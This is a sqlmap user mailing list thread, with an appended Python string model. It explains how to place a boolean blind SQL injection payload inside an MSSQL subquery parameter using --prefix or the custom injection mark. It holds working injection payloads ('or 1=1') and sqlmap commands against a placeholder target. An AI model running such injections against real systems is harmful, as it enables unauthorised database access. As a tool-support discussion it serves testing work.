Hi.
--prefix is a formation that goes in between *value* and *payload*:
...=*value prefix payload*...
This simply means that you've forgotten about the complete *value* thing in your
case.
In your case, use of the custom injection mark (*) is more appropriate:
python sqlmap.py -u "www.target.com/vuln.php?param=(select name from sysusers where udi=-1 *)"
Kind regards,
Miroslav Stampar
On Wed, Oct 2, 2013 at 2:29 PM, Raphael GONZALEZ <raphag...@gmail.com> wrote:
> Hi,
>
> sqlmap/1.0-dev-25eca9d
>
> I can't manage to get Sqlmap to generate the good payload!
>
> Here is my entry point :
> (dbms = MSSQL)
>
> I got this with manual tries in burp :
>
> param value : (select name from sysusers where udi=-1)
> - if the select returns no value => HTTP request returns 200
> - otherwise returns 302 to an error page
>
> so
> with param value : (select name from sysusers where udi=-1 or 1=1) => returns error
> with param value : (select name from sysusers where udi=-1 or 1=2) => returns 200
>
> I thought I could make Sqlmap find a boolean based blind test with OR
> statements
> So I tried this command :
> ./sqlmap.py -r myreq.txt -p param --level=3 --risk=3 --prefix="(select name from sysusers where udi=-1 " --suffix=")"
>
> nothing is found
> but when I look at generated payloads, I get
> [PAYLOAD] -9402(select name from sysusers where udi=-1 OR (9544=9561))
>
> so I always get a number generated before my command
>
> Where am I wrong ?
>
> Thanks
--
Miroslav Stampar
http://about.me/stamparm
_______________________________________________
sqlmap-users mailing list
sqlmap-users@lists.sourceforge.net
https://lists.sourceforge.net/lists/listinfo/sqlmap-users
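
Added example, not part of the thread and not sqlmap's own code: a simplified Python string model of the two placements discussed above, built from the strings quoted in the messages. It assumes the injection mark is simply replaced by the payload; all function names are hypothetical.

```python
# Added illustration (not sqlmap code): a string model of where a test
# payload lands inside a single request parameter.

MARK = "*"  # custom injection mark, as used in the reply

# Values copied from the thread.
VALUE = "-9402"                                      # number in front of the logged payload
PREFIX = "(select name from sysusers where udi=-1 "  # --prefix
SUFFIX = ")"                                         # --suffix
PAYLOAD = "OR (9544=9561)"                           # boolean test from the log
LOGGED = "-9402(select name from sysusers where udi=-1 OR (9544=9561))"
MARKED = "(select name from sysusers where udi=-1 *)"  # parameter from the reply


def with_prefix_suffix(value, prefix, payload, suffix=""):
    """Placement described in the reply: value, then prefix, then payload."""
    return f"{value}{prefix}{payload}{suffix}"


def with_injection_mark(template, payload, mark=MARK):
    """Substitute the payload at the single mark inside the parameter."""
    if template.count(mark) != 1:
        raise ValueError("expected exactly one injection mark")
    return template.replace(mark, payload)


def leading_value(fragment):
    """Text in front of the first '(' (empty when the subquery comes first)."""
    return fragment.split("(", 1)[0]


def compare():
    """Return both compositions so they can be inspected side by side."""
    a = with_prefix_suffix(VALUE, PREFIX, PAYLOAD, SUFFIX)
    b = with_injection_mark(MARKED, PAYLOAD)
    return {"prefix/suffix": a, "injection mark": b}


if __name__ == "__main__":
    for mode, fragment in compare().items():
        print(f"{mode:15} leading value={leading_value(fragment)!r:8} {fragment}")
```

The prefix/suffix composition reproduces the logged payload exactly, with the value slot still in front of the subquery; the marked parameter has no value slot ahead of the opening parenthesis.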